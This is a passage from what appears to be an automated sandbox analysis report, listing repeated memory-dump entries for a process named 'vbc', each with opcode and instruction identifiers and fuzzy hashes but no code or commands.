                                                                                                                                                  • Instruction Fuzzy Hash: 9B319175A00209EFDB14CF58C484DEE77BAFF94704F15485AE8069B390E7B1EA40CB94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                  • Instruction ID: dd2c4ced086b64b6b0926ff5d90350d61e1201febd46e9266362c120ec8360cd
                                                                                                                                                  • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                  • Instruction Fuzzy Hash: 2631AB31600648EFDB21DFA9C889F6AB7F9FF44354F1449A9E5529B290E730EE41CB50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                                                                                  • Instruction ID: a3c17dcf6fbe7f4d696cd7781a7be32f356baaca0e97a3491187a79fa76992eb
                                                                                                                                                  • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                                                                                  • Instruction Fuzzy Hash: 0C2136377016929BD729DB79C908F357BA6FF40798F090CA4DD02876D1E368DD40C614
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 070b27ed33bf6fbc9b20eaf773b49b689cdfa2d1ab58807d6ed5400ff4a70ba8
                                                                                                                                                  • Instruction ID: 304298c451e0043556b11e462859578b6b6d3411e882d94a314bcd5a0bbbcad7
                                                                                                                                                  • Opcode Fuzzy Hash: 070b27ed33bf6fbc9b20eaf773b49b689cdfa2d1ab58807d6ed5400ff4a70ba8
                                                                                                                                                  • Instruction Fuzzy Hash: 57219171A00229DBCF15DF59C885ABEBBF4FF48744B54046AF841B7240D778AD51DBA0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 376cf689a71d7a4c7b9feb165f387c3a76090ec38be810c4313775a7ee402540
                                                                                                                                                  • Instruction ID: 60b02165022993571ad026921beb005765964c0f016486e7992abc4667efa10b
                                                                                                                                                  • Opcode Fuzzy Hash: 376cf689a71d7a4c7b9feb165f387c3a76090ec38be810c4313775a7ee402540
                                                                                                                                                  • Instruction Fuzzy Hash: 91218B71600644EFC715DFA8D848A6ABBB8FF48790F1408A9F905E7690D638ED40CBA8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5863df05514a3b1de3a0ac157c8c43211b28deca8270a3c9d1f6271c03d63214
                                                                                                                                                  • Instruction ID: 24c49dac2ebd7ba0e3d10c6be377688f5cf8c6fb285479427dea05eb1130377f
                                                                                                                                                  • Opcode Fuzzy Hash: 5863df05514a3b1de3a0ac157c8c43211b28deca8270a3c9d1f6271c03d63214
                                                                                                                                                  • Instruction Fuzzy Hash: 7E219072A08285DBC711DF99C84CB6FBBECAF81650F080C9AFC819B251D734DA45D6A5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                                                                                                  • Instruction ID: f4dfc525d6de4ce095578f90c87e888c53f413c9000c28f8e24a3809871f5884
                                                                                                                                                  • Opcode Fuzzy Hash: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                                                                                                  • Instruction Fuzzy Hash: 4B318D76604601CFC720CF69C180F26BBE5FB48714F2888ADE94A8B755DB31E942CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a12e9d3b53d348922bd15b3089679a6f56faccfe3aab937272952e5274a4574c
                                                                                                                                                  • Instruction ID: 48eb1564271f5965ba0f28bca6efe218d2c2908b43a2bc9d498c316a0951cae5
                                                                                                                                                  • Opcode Fuzzy Hash: a12e9d3b53d348922bd15b3089679a6f56faccfe3aab937272952e5274a4574c
                                                                                                                                                  • Instruction Fuzzy Hash: 57113A32390F147FE36255589C05F27FA9ADBC4B20F200C24B70CDB280DA70DC009795
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3eea8d2a41627a2702678e24dcd4bb973144f163644dbab69603334bada9d95a
                                                                                                                                                  • Instruction ID: 2de0e8e3aee700675b1bd8229841304ee3334721c5af5c3c0dbc1ac2f9392ea6
                                                                                                                                                  • Opcode Fuzzy Hash: 3eea8d2a41627a2702678e24dcd4bb973144f163644dbab69603334bada9d95a
                                                                                                                                                  • Instruction Fuzzy Hash: 5821CF35200640AFC725DF69CC01B5677F5FF08B44F248869A409CBB61E335E982CF98
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                  • Instruction ID: beaa2f8dc883e23740464ce3003c0f58c056f0ecbfe6623c76786594a962cd45
                                                                                                                                                  • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                  • Instruction Fuzzy Hash: 0B216D72A00209AFDB129F98CC44FAEBBBAEF48360F200859FA01E7250D774D9509B60
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4595c80ef210ccd217e3b8b90c88f00f6325ee4d2ad5d2af99f18e67937333ad
                                                                                                                                                  • Instruction ID: 94b4c64f2134a4334488a7e2289169e5de4291e27422446cf13f4eb72fd0742b
                                                                                                                                                  • Opcode Fuzzy Hash: 4595c80ef210ccd217e3b8b90c88f00f6325ee4d2ad5d2af99f18e67937333ad
                                                                                                                                                  • Instruction Fuzzy Hash: AE116D357056119BCB11CF49C590E67B7FAFF4A750B198469FD09AF204D6B2DA01CBA0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                  • Instruction ID: 3438d21af53c82e80a8be2cbb433458fbcc16242633a48c47dcab8578939afc5
                                                                                                                                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                  • Instruction Fuzzy Hash: 93110473600608BFD7229F84CC49FABB7B9EB80754F100829F601AB580D6B1EE44DB50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                                                                                                  • Instruction ID: 1607a201f514a67ae084ebc06616b2ace63d786b3594d474f9812486a399cd6e
                                                                                                                                                  • Opcode Fuzzy Hash: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                                                                                                  • Instruction Fuzzy Hash: 0D215E75A00219AFCB05CF88C880DAEBBB9FF58754B1144A9E805AB351DA71AE41CBA0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2d7625d75cd50ba111e5a682b3e2804d5aeaf10c8266481feedf513f64105052
                                                                                                                                                  • Instruction ID: 297fd42464b6632c03a8adb94f36b5c78e4d279831b408a04248958e30803183
                                                                                                                                                  • Opcode Fuzzy Hash: 2d7625d75cd50ba111e5a682b3e2804d5aeaf10c8266481feedf513f64105052
                                                                                                                                                  • Instruction Fuzzy Hash: 7F215B75A00205DFCB14CF99C581AAEBBB6FB88718F24456ED505AB350CB71AE46CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 32d85e4941be696660eec96e53a21a6eb33fc7cd1a8f41f80157559831c87a34
                                                                                                                                                  • Instruction ID: de8e67436477b3cfa553c9be0700dcebaa62419dd444a4a32426df4098c7fdab
                                                                                                                                                  • Opcode Fuzzy Hash: 32d85e4941be696660eec96e53a21a6eb33fc7cd1a8f41f80157559831c87a34
                                                                                                                                                  • Instruction Fuzzy Hash: 56216A71614A04EFC720DF69C881F66B3F9FB44390F448C6DE4AAC7A50DA70A980CBA0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d749146d65b55d304c84beaf4f1ac0e286ed94293e6749652d4d1180a6a0959f
                                                                                                                                                  • Instruction ID: 7fdfbb26d62775ecfab79dfd1ff945927fceb9c37d938fcb5fd5fdf8d6474101
                                                                                                                                                  • Opcode Fuzzy Hash: d749146d65b55d304c84beaf4f1ac0e286ed94293e6749652d4d1180a6a0959f
                                                                                                                                                  • Instruction Fuzzy Hash: CA11E376A01648EFCB25CF99C580E5ABBF5EF84790B1184BAE9059B710DB30DE80CB94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
• Opcode ID: 99dd510900b107a29eaf74a84ffa599d6a4167e62bbdf165f25f23eae9302140
• Instruction ID: b759f99bcd5e30978ec8e0c125e9d61c642686eac6fc56290ce9ae32fd25b31a
• Opcode Fuzzy Hash: 99dd510900b107a29eaf74a84ffa599d6a4167e62bbdf165f25f23eae9302140
• Instruction Fuzzy Hash: A4110C7D3083206BE721671EDC87F26BED5EB40A90FD80827F50597790D9B0D804EEA5

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
• Instruction ID: d62fe816315ab99324dd851b562e2ad59f6eb6c3cca2f0a065787db71d15ceca
• Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
• Instruction Fuzzy Hash: 5C119131605604EFEB22DF49C844F5A7BAEFB46754F058CACE9099B250D771DD40DB90

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1d540e95b0914d28b4c619ff61b0288f05f0d3a9d34ab142fae1a8bc19f89d5b
• Instruction ID: fa1fba5723756f56bf224f9889d302ace5e15f1345e3c17d742c0efde435a125
• Opcode Fuzzy Hash: 1d540e95b0914d28b4c619ff61b0288f05f0d3a9d34ab142fae1a8bc19f89d5b
• Instruction Fuzzy Hash: 07012B3770A685AFE316966EDC88F276B9DFF44798F050C65F80187141D514DD00C2B1

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7b0ef4ff8b4bcc63e71d33192bda34c454c54b373d043698cc72bd5bb31afab5
• Instruction ID: 8cb41a3cd35f285848129470ad389a8cf6a74498d7dcdebc60403de20128bac7
• Opcode Fuzzy Hash: 7b0ef4ff8b4bcc63e71d33192bda34c454c54b373d043698cc72bd5bb31afab5
• Instruction Fuzzy Hash: AE11B836245640AFCB29CF59D884F577BB9EB86A64F24492AF8048B240C774E941DFA0

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 64b7b3bae0640ee463ce06485fb1907c1b7c3eaee141b0662bcc67784f42fa7a
• Instruction ID: a51cf732660dee6bf49c3277a4832f5cf77b462bdda295e89edbd867923d81fe
• Opcode Fuzzy Hash: 64b7b3bae0640ee463ce06485fb1907c1b7c3eaee141b0662bcc67784f42fa7a
• Instruction Fuzzy Hash: B3118276A00B19ABCB21DF69D980F5EFBB8FF44790F900859D906B7600D730AE819B64

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
• Instruction ID: 15a7ddb90413f68e79ff37d4cda85724e24570f4a7b3f486fe024ef9e4f55e77
• Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
• Instruction Fuzzy Hash: 3711293A2056C29BD7228B69C484B667BA9FB00798F090CA5ED4287641F338CA42C254

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
• Instruction ID: 2892140bf56d9f2d578b7a8f68f0289f8af56b01344ee6fb95d51e73d52246ee
• Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
• Instruction Fuzzy Hash: F201D232B04104AFDB239F55C804F5B7EBEFB42B50F0688A8E9069B260E771DE40DB90

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
• Instruction ID: 56b28dd241480824e87dc692c7454752e0b9bcd8754f46ab24b59d888f06347d
• Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
• Instruction Fuzzy Hash: 24010431504719ABCB309F159C41A367BA5FB457607008E2DFCD9CB680C336D560CBA0

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 50f35812fd32aefad424c1fea29a728615ca3c944def5b40dd9564c02801ec14
• Instruction ID: bb1a3d149c3c2a432a4588be65f87d0d6d4eeebbe01684a2014747c89e84ab4e
• Opcode Fuzzy Hash: 50f35812fd32aefad424c1fea29a728615ca3c944def5b40dd9564c02801ec14
• Instruction Fuzzy Hash: B311AD32241240EFDB16EF59CD84F96BBB8FF48B94F240865F9059B662C375ED01DA90

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e75a3d0b4ad52279ed9e722b77db3e878d27b9f400e8187933206e0104f84955
• Instruction ID: d084f3ff4a142b76976188f76c6e97bf9aaa2fe4070ae6a1e79b1e14e123bb87
• Opcode Fuzzy Hash: e75a3d0b4ad52279ed9e722b77db3e878d27b9f400e8187933206e0104f84955
• Instruction Fuzzy Hash: 45119A71602228ABDB25EB64CC4AFF9B3B4BB04714F5049D4A319A60E0DB709E81DF84

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 58a4fec0dcf06506bd7dc71b046983f0c4f300a8e51647a6b0b8bd2cc150bd7c
• Instruction ID: 6d5c849879dfc1adda40ae542acc52f345a2cd4598f5f3bfa3419e96dc224330
• Opcode Fuzzy Hash: 58a4fec0dcf06506bd7dc71b046983f0c4f300a8e51647a6b0b8bd2cc150bd7c
• Instruction Fuzzy Hash: 9601B135714602ABCF15AE69E849C67BBA6FF85310B00093DF94583651DF31EC54DAD1

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
• Instruction ID: cd5b545bafa5f6e2e8bf8ba03d54d8d818cda7cbf446a833d019fcdabce10556
• Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
• Instruction Fuzzy Hash: 3F014C7160851967DF2D9B95C808B9F7F69EB80B60F144859A9075B680D774DEC0C3F0

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e75280e390ba5d20d221833df3ed04030dbdcf24a5758f742e85bee5f82a2b35
• Instruction ID: 6cd406bd58329c82fd9f591dd64626e6bb40472682f4482709c564b0f8dcb9a2
• Opcode Fuzzy Hash: e75280e390ba5d20d221833df3ed04030dbdcf24a5758f742e85bee5f82a2b35
• Instruction Fuzzy Hash: 5411E1326041469FC300CF59D800BA6FBBAFB4A354F088559E949CB311E732E9C0CBB0

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
• Instruction ID: eb185198267a9481c1b7f60f9a43d33a010efd0c86bf29cd00839b2a685ba2a9
• Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
• Instruction Fuzzy Hash: D301F1363001009BDF259E2AD884FB277A7BFC4710F1548AAFC02CF245DAB1C981DBA0

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 011e77503f94554f767445d8ebccdb7f02af99460cbe65dcb89d1647ebb59ad4
• Instruction ID: a27953eba6b5bd79f13cc3b080a7f186f07ed71ec4e3c5bc6611a5e883df3fc8
• Opcode Fuzzy Hash: 011e77503f94554f767445d8ebccdb7f02af99460cbe65dcb89d1647ebb59ad4
• Instruction Fuzzy Hash: A7111772900019ABCB11DB98CC84DEFBB7DEF48258F044566E916A7210EA34AA55CBE0

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c18ad6b36a89cf115a3e7b686dd114045f6aa450575767d255f290452dad8930
• Instruction ID: 7d87dea90852333d3829f24a0f9e7d957148aecf48bd4554100cb189be604132
• Opcode Fuzzy Hash: c18ad6b36a89cf115a3e7b686dd114045f6aa450575767d255f290452dad8930
                                                                                                                                                  • Instruction Fuzzy Hash: 87014C72A14158BBCF11DFADDD45EAFBFB9EB48650F040066F515E7211CA30DA11DBA0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 74e4c0ac71b3d7252ebe2667383899b1291009313e45c8418a14c87a5f156ea5
                                                                                                                                                  • Instruction ID: 8d3216026dd4038d78018c37cd51781f39dd7d93943f9a354c5b4c5cb9c1b0cb
                                                                                                                                                  • Opcode Fuzzy Hash: 74e4c0ac71b3d7252ebe2667383899b1291009313e45c8418a14c87a5f156ea5
                                                                                                                                                  • Instruction Fuzzy Hash: BB01A272701A44BFD711ABB9CD88E57B7ECFF896A0B000E26B90583651DB74EC41D6E4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8454b29ed4d2224677d070cdee1b87a5cd1946021705a86300798ef51c7adf53
                                                                                                                                                  • Instruction ID: f8c30876bb63dbe425e9d966201d4e695b72c21f9f73f8bad5d4d781208dc5b2
                                                                                                                                                  • Opcode Fuzzy Hash: 8454b29ed4d2224677d070cdee1b87a5cd1946021705a86300798ef51c7adf53
                                                                                                                                                  • Instruction Fuzzy Hash: 1F11AD35A0020CEBDF04EFA4C849EAE7BB6FB44244F104459F9029B280EA35AE01CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                  • Instruction ID: 0d93698778710539632e0c315468c6995e606549a0966a26822ad2eac5d52b2d
                                                                                                                                                  • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                  • Instruction Fuzzy Hash: BC012872204748AFDF22DA66D808FAB73EAFFC4250F044C1AA9879B540DE74E901CB60
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
